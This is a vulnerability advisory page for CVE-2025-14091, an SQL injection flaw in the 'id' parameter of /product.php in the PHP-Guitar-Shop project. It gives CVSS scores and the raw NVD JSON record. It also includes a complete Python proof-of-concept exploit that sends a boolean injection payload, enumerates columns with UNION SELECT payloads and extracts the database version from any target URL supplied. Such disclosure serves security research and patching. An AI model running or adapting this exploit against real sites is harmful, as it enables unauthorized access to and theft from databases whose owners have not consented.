Security Vulnerability Report
中文
CVE-2025-14091 CVSS 7.3 HIGH

CVE-2025-14091

Published: 2025-12-05 16:15:49
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A weakness has been identified in TrippWasTaken PHP-Guitar-Shop up to 6ce0868889617c1975982aae6df8e49555d0d555. This vulnerability affects unknown code of the file /product.php of the component Product Details Page. Executing manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PHP-Guitar-Shop <= 6ce0868889617c1975982aae6df8e49555d0d555 (所有使用该commit及之前代码的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14091 SQL Injection PoC for TrippWasTaken PHP-Guitar-Shop # Target: /product.php?id= parameter def test_basic_injection(url): """Test basic SQL injection vulnerability""" payload = "1' OR '1'='1" target_url = f"{url}/product.php?id={payload}" print(f"[*] Testing target: {target_url}") try: response = requests.get(target_url, timeout=10) # Check for SQL error messages indicating vulnerability sql_errors = [ "SQL syntax", "mysql_fetch", "mysqli_fetch", "Warning: mysql", "SQLite3::query", "PGresult", "syntax error or access violation" ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[!] VULNERABLE! SQL error detected: {error}") return True if response.status_code == 200 and len(response.text) > 100: print("[+] Potential vulnerability - no SQL errors but page loads") return True except requests.RequestException as e: print(f"[!] Request failed: {e}") return False return False def test_union_injection(url): """Test UNION-based SQL injection""" # Determine number of columns (adjust based on application) for i in range(1, 10): payload = f"1' UNION SELECT {','.join(['NULL']*i)}-- -" target_url = f"{url}/product.php?id={payload}" try: response = requests.get(target_url, timeout=10) if response.status_code == 200 and "NULL" not in response.text: print(f"[+] Found {i} columns for UNION injection") return i except: continue return None def extract_data(url, num_cols): """Extract database information using UNION injection""" # Common database extraction payload payload = f"1' UNION SELECT {','.join(['@@version']*num_cols)}-- -" target_url = f"{url}/product.php?id={payload}" print(f"[*] Extracting database version...") try: response = requests.get(target_url, timeout=10) # Parse response for database version if response.status_code == 200: print(f"[+] Database info extracted (check response for details)") return response.text[:500] except: pass return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-14091-poc.py <target_url>") print("Example: python cve-2025-14091-poc.py http://vulnerable-site.com") sys.exit(1) target = sys.argv[1].rstrip('/') print("=" * 60) print("CVE-2025-14091 SQL Injection PoC") print("Target: TrippWasTaken PHP-Guitar-Shop /product.php") print("=" * 60) if test_basic_injection(target): print("\n[*] Proceeding with detailed testing...") cols = test_union_injection(target) if cols: extract_data(target, cols) else: print("[-] Target may not be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14091", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:49.337", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in TrippWasTaken PHP-Guitar-Shop up to 6ce0868889617c1975982aae6df8e49555d0d555. This vulnerability affects unknown code of the file /product.php of the component Product Details Page. Executing manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/appaxv/report/blob/main/guitarshopsql.docx", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334481", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334481", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.696514", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.